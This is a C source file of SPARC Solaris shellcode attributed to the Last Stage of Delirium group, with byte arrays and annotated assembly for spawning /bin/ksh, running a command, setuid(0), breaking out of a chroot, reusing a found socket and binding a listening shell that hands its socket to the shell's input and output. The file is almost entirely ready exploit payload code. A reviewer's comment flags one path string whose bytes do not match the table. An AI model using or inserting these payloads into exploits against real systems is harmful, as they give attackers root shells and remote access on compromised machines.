/*## copyright LAST STAGE OF DELIRIUM feb 2001 poland        *://lsd-pl.net/ #*/
/*## asmcodes for solaris 2.6 2.7 2.8 sparc                                  #*/

/*
syscall     %g1  %o0,%o1,%o2,%o3,%o4
----------- ---- ---------------------------------------------------------------
exec        x00b ->path="/bin/ksh",->[->a0=path,0]
exec        x00b ->path="/bin/ksh",->[->a0=path,->a1="-c",->a2=cmd,0]
setuid      x017 uid=0
mkdir       x050 ->path="b..",mode= (any value is valid)
chroot      x03d ->path={"b..","."}
chdir       x00c ->path=".."
ioctl       x036 sfd,TI_GETPEERNAME=0x5491,->[mlen=0x54,len=0x54,->sadr=[]]
so_socket   x0e6 AF_INET=2,SOCK_STREAM=2,prot=0,devpath=0,SOV_DEFAULT=1 
bind        x0e8 sfd,->sadr=[0x33,2,hi,lo,0,0,0,0],len=0x10,SOV_SOCKSTREAM=2
listen      x0e9 sfd,backlog=5,vers= (not required in this syscall)
accept      x0ea sfd,0,0,vers= (not required in this syscall)
fcntl       x03e sfd,F_DUP2FD=0x09,fd={0,1,2}
*/

#if defined(SPARC) && defined(SOLARIS)

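#ifdef ABOVE_SPARCV8PLUS
/* sparcv8+ variant of exec("/bin/ksh",{path,0}) -- first "exec x00b" row
 * of the table above.  `rd %pc` yields the buffer address directly, so the
 * bn,a/bn,a/call prologue of the v8 variant below is not needed.
 * sizeof shellcode == 8*4+8+1 (the string literal contributes a NUL).   */
char shellcode[]=          /* 8*4+8 bytes                    */
    "\x9f\x41\x40\x01"     /* rd      %pc,%o7  ! >= sparcv8+ */
    "\x90\x03\xe0\x20"     /* add     %o7,32,%o0             */
    "\x92\x02\x20\x10"     /* add     %o0,16,%o1             */
    "\xc0\x22\x20\x08"     /* st      %g0,[%o0+8]            */
    "\xd0\x22\x20\x10"     /* st      %o0,[%o0+16]           */
    "\xc0\x22\x20\x14"     /* st      %g0,[%o0+20]           */
    "\x82\x10\x20\x0b"     /* mov     0x0b,%g1               */
    "\x91\xd0\x20\x08"     /* ta      8                      */
    "/bin/ksh"
;
#else
/* generic sparcv8 variant of the same exec("/bin/ksh",{path,0}).
 * `#else` keeps exactly one definition of `shellcode` active whichever way
 * ABOVE_SPARCV8PLUS is set; an unconditional second definition here would
 * be a redefinition error as soon as the macro is defined.
 * sizeof shellcode == 10*4+8+1 (the string literal contributes a NUL).  */
char shellcode[]=          /* 10*4+8 bytes                   */
    "\x20\xbf\xff\xff"     /* bn,a    <shellcode-4>          */
    "\x20\xbf\xff\xff"     /* bn,a    <shellcode>            */
    "\x7f\xff\xff\xff"     /* call    <shellcode+4>          */
    "\x90\x03\xe0\x20"     /* add     %o7,32,%o0             */
    "\x92\x02\x20\x10"     /* add     %o0,16,%o1             */
    "\xc0\x22\x20\x08"     /* st      %g0,[%o0+8]            */
    "\xd0\x22\x20\x10"     /* st      %o0,[%o0+16]           */
    "\xc0\x22\x20\x14"     /* st      %g0,[%o0+20]           */
    "\x82\x10\x20\x0b"     /* mov     0x0b,%g1               */
    "\x91\xd0\x20\x08"     /* ta      8                      */
    "/bin/ksh"
;
#endif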

/* exec("/bin/ksh",{path,"-c",cmd,0}) -- second "exec x00b" row above.
 * The 16-byte tail "/bin/ksh    -c  " is a template: the two stb's write
 * NULs at tail+8 and tail+14, splitting it into "/bin/ksh" and "-c", and
 * the command string is appended by the caller right after the tail
 * (hence "+cmdlen").  The argv array is built at %o7-32..%o7-20, i.e. in
 * memory *before* the start of this buffer.  sizeof cmdshellcode also
 * counts the literal's trailing NUL.                                     */
char cmdshellcode[]=       /* 15*4+16+cmdlen bytes           */
    "\x20\xbf\xff\xff"     /* bn,a    <cmdshellcode-4>       */
    "\x20\xbf\xff\xff"     /* bn,a    <cmdshellcode>         */
    "\x7f\xff\xff\xff"     /* call    <cmdshellcode+4>       */
    "\x90\x03\xe0\x34"     /* add     %o7,52,%o0             */
    "\x92\x23\xe0\x20"     /* sub     %o7,32,%o1             */
    "\xa2\x02\x20\x0c"     /* add     %o0,12,%l1             */
    "\xa4\x02\x20\x10"     /* add     %o0,16,%l2             */
    "\xc0\x2a\x20\x08"     /* stb     %g0,[%o0+8]            */
    "\xc0\x2a\x20\x0e"     /* stb     %g0,[%o0+14]           */
    "\xd0\x23\xff\xe0"     /* st      %o0,[%o7-32]           */
    "\xe2\x23\xff\xe4"     /* st      %l1,[%o7-28]           */
    "\xe4\x23\xff\xe8"     /* st      %l2,[%o7-24]           */
    "\xc0\x23\xff\xec"     /* st      %g0,[%o7-20]           */
    "\x82\x10\x20\x0b"     /* mov     0x0b,%g1               */
    "\x91\xd0\x20\x08"     /* ta      8                      */
    "/bin/ksh    -c  "
    /* command */          /* appended by the caller, NUL-terminated */
;

/* setuid(0) -- "setuid x017" row above.  %o0 is zeroed with `and %g0,1`,
 * presumably chosen over `mov 0,%o0` because this encoding has no 0x00
 * byte.  sizeof setuidcode == 3*4+1.                                     */
char setuidcode[]=         /* 3*4 bytes                      */
    "\x90\x08\x20\x01"     /* and     %g0,1,%o0              */
    "\x82\x10\x20\x17"     /* mov     0x17,%g1               */
    "\x91\xd0\x20\x08"     /* ta      8                      */
;

/* mkdir/chroot/chdir/chroot sequence of the table above (rows mkdir x050,
 * chroot x03d, chdir x00c).  The path bytes live in the word at offset 12;
 * the stb at [%o7+8] NUL-terminates them at offset 16, and the three
 * `add %o7,N,%o0` forms (N=5,6,7) select the suffixes starting at
 * offsets 13, 14 and 15.  %l5 counts 32 iterations of the chdir loop.
 * sizeof chrootcode == 20*4+1.                                           */
char chrootcode[]=         /* 20*4 bytes                     */
    "\x20\xbf\xff\xff"     /* bn,a    <chrootcode-4>         */
    "\x20\xbf\xff\xff"     /* bn,a    <chrootcode>           */
    "\x7f\xff\xff\xff"     /* call    <chrootcode+4>         */
    "\x80\x61.."           /* path bytes: 0x80,'a','.','.'  -- NOTE(review): table above says "b..", bytes here spell "a.."; confirm */
    "\xc0\x2b\xe0\x08"     /* stb     %g0,[%o7+8]            */
    "\x90\x03\xe0\x05"     /* add     %o7,5,%o0              */
    "\x82\x10\x20\x50"     /* mov     0x50,%g1               */
    "\x91\xd0\x20\x08"     /* ta      8                      */
    "\x90\x03\xe0\x05"     /* add     %o7,5,%o0              */
    "\x82\x10\x20\x3d"     /* mov     0x3d,%g1               */
    "\x91\xd0\x20\x08"     /* ta      8                      */
    "\xaa\x20\x3f\xe0"     /* sub     %g0,-32,%l5            */
    "\x90\x03\xe0\x06"     /* add     %o7,6,%o0              */
    "\x82\x10\x20\x0c"     /* mov     0x0c,%g1               */
    "\xaa\x85\x7f\xff"     /* addcc   %l5,-1,%l5             */
    "\x12\xbf\xff\xfd"     /* bne     <chrootcode+48>  (cond field 1001 = bne, same opcode byte as the bne's in findsckcode) */
    "\x91\xd0\x20\x08"     /* ta      8                      */
    "\x90\x03\xe0\x07"     /* add     %o7,7,%o0              */
    "\x82\x10\x20\x3d"     /* mov     0x3d,%g1               */
    "\x91\xd0\x20\x08"     /* ta      8                      */
;

/* "find socket": walks descriptors from 0xff downwards, issues the ioctl
 * of the "ioctl x036" row (TI_GETPEERNAME) on each, compares the first
 * word of the returned sockaddr with the word at offset 12 (after the stb
 * has zeroed its first byte, that word reads {0,2,hi,lo} = {AF_INET,port}),
 * then dups the match onto fds 2,1,0 via the "fcntl x03e" row.
 * The ioctl struct and sockaddr buffer are built at %o7-60..%o7-48, i.e.
 * before the start of this buffer.  sizeof findsckcode == 35*4+1.        */
char findsckcode[]=        /* 35*4 bytes                     */
    "\x20\xbf\xff\xff"     /* bn,a    <findsckcode-4>        */
    "\x20\xbf\xff\xff"     /* bn,a    <findsckcode>          */
    "\x7f\xff\xff\xff"     /* call    <findsckcode+4>        */
    "\x33\x02\x12\x34"     /* data: [0x33,2,hi,lo]; bytes 14-15 (0x1234) are the port field, see FINDSCKPORTOFS */
    "\xa0\x10\x20\xff"     /* mov     0xff,%l0               */
    "\xa2\x10\x20\x54"     /* mov     0x54,%l1               */
    "\xa4\x03\xff\xd0"     /* add     %o7,-48,%l2            */
    "\xaa\x03\xe0\x28"     /* add     %o7,40,%l5             */
    "\x81\xc5\x60\x08"     /* jmp     %l5+8                  */
    "\xc0\x2b\xe0\x04"     /* stb     %g0,[%o7+4]            */
    "\xe6\x03\xff\xd0"     /* ld      [%o7-48],%l3           */
    "\xe8\x03\xe0\x04"     /* ld      [%o7+4],%l4            */
    "\xa8\xa4\xc0\x14"     /* subcc   %l3,%l4,%l4            */
    "\x02\xbf\xff\xfb"     /* bz      <findsckcode+32>       */
    "\xaa\x03\xe0\x5c"     /* add     %o7,92,%l5             */
    "\xe2\x23\xff\xc4"     /* st      %l1,[%o7-60]           */
    "\xe2\x23\xff\xc8"     /* st      %l1,[%o7-56]           */
    "\xe4\x23\xff\xcc"     /* st      %l2,[%o7-52]           */
    "\x90\x04\x20\x01"     /* add     %l0,1,%o0              */
    "\xa7\x2c\x60\x08"     /* sll     %l1,8,%l3              */
    "\x92\x14\xe0\x91"     /* or      %l3,0x91,%o1           */
    "\x94\x03\xff\xc4"     /* add     %o7,-60,%o2            */
    "\x82\x10\x20\x36"     /* mov     0x36,%g1               */
    "\x91\xd0\x20\x08"     /* ta      8                      */
    "\x1a\xbf\xff\xf1"     /* bcc     <findsckcode+36>       */
    "\xa0\xa4\x20\x01"     /* deccc   %l0                    */
    "\x12\xbf\xff\xf5"     /* bne     <findsckcode+60>       */
    "\xa6\x10\x20\x03"     /* mov     0x03,%l3               */
    "\x90\x04\x20\x02"     /* add     %l0,2,%o0              */
    "\x92\x10\x20\x09"     /* mov     0x09,%o1               */
    "\x94\x04\xff\xff"     /* add     %l3,-1,%o2             */
    "\x82\x10\x20\x3e"     /* mov     0x3e,%g1               */
    "\xa6\x84\xff\xff"     /* addcc   %l3,-1,%l3             */
    "\x12\xbf\xff\xfb"     /* bne     <findsckcode+112>      */
    "\x91\xd0\x20\x08"     /* ta      8                      */
;

/* so_socket/bind/listen/accept/fcntl sequence of the table above.  The
 * sockaddr passed to bind is the 8 bytes at offset 12 ([0x33,2,hi,lo]
 * followed by the word the `st %g0,[%o7+8]` zeroes), matching the
 * "bind x0e8" row; %l1 keeps the listening fd+1 (NUL-free), and the final
 * loop dups the accepted fd onto 2,1,0.  sizeof bindsckcode == 34*4+1.  */
char bindsckcode[]=        /* 34*4 bytes                     */
    "\x20\xbf\xff\xff"     /* bn,a    <bindsckcode-4>        */
    "\x20\xbf\xff\xff"     /* bn,a    <bindsckcode>          */
    "\x7f\xff\xff\xff"     /* call    <bindsckcode+4>        */
    "\x33\x02\x12\x34"     /* data: sadr [0x33,2,hi,lo]; bytes 14-15 (0x1234) are the port field, see BINDSCKPORTOFS */
    "\x90\x10\x20\x02"     /* mov     0x02,%o0               */
    "\x92\x10\x20\x02"     /* mov     0x02,%o1               */
    "\x94\x08\x20\x01"     /* and     %g0,1,%o2              */
    "\x96\x08\x20\x01"     /* and     %g0,1,%o3              */
    "\x98\x10\x20\x01"     /* mov     0x01,%o4               */
    "\x82\x10\x20\xe6"     /* mov     0xe6,%g1               */
    "\x91\xd0\x20\x08"     /* ta      8                      */
    "\xa2\x22\x3f\xff"     /* sub     %o0,-1,%l1             */
    "\xc0\x23\xe0\x08"     /* st      %g0,[%o7+8]            */
    "\x92\x03\xe0\x04"     /* add     %o7,4,%o1              */
    "\x94\x10\x20\x10"     /* mov     0x10,%o2               */
    "\x96\x10\x20\x02"     /* mov     0x02,%o3               */
    "\x82\x10\x20\xe8"     /* mov     0xe8,%g1               */
    "\x91\xd0\x20\x08"     /* ta      8                      */
    "\x90\x04\x7f\xff"     /* add     %l1,-1,%o0             */
    "\x92\x10\x20\x05"     /* mov     0x05,%o1               */
    "\x82\x10\x20\xe9"     /* mov     0xe9,%g1               */
    "\x91\xd0\x20\x08"     /* ta      8                      */
    "\x90\x04\x7f\xff"     /* add     %l1,-1,%o0             */
    "\x92\x08\x20\x01"     /* and     %g0,1,%o1              */
    "\x94\x08\x20\x01"     /* and     %g0,1,%o2              */
    "\x82\x10\x20\xea"     /* mov     0xea,%g1               */
    "\x91\xd0\x20\x08"     /* ta      8                      */
    "\xa6\x10\x20\x03"     /* mov     0x03,%l3               */
    "\x92\x10\x20\x09"     /* mov     0x09,%o1               */
    "\x94\x04\xff\xff"     /* add     %l3,-1,%o2             */
    "\x82\x10\x20\x3e"     /* mov     0x3e,%g1               */
    "\xa6\x84\xff\xff"     /* addcc   %l3,-1,%l3             */
    "\x12\xbf\xff\xfc"     /* bne     <bindsckcode+112>      */
    "\x91\xd0\x20\x08"     /* ta      8                      */
;

/* 2*4 bytes: jump to %o7+8 with %sp copied into %o0 by the instruction in
 * the jmp delay slot.  No size comment in the original; sizeof jump == 9. */
char jump[]=
    "\x81\xc3\xe0\x08"     /* jmp     %o7+8                  */
    "\x90\x10\x00\x0e"     /* mov     %sp,%o0                */
;

/* Byte offsets of the 2-byte port field inside findsckcode / bindsckcode:
 * both arrays carry the word "\x33\x02\x12\x34" at offset 12, so bytes
 * 14-15 (0x1234) are the value a caller overwrites.  The arrays are
 * therefore deliberately non-const.                                      */
#define FINDSCKPORTOFS     14
#define BINDSCKPORTOFS     14

#endif
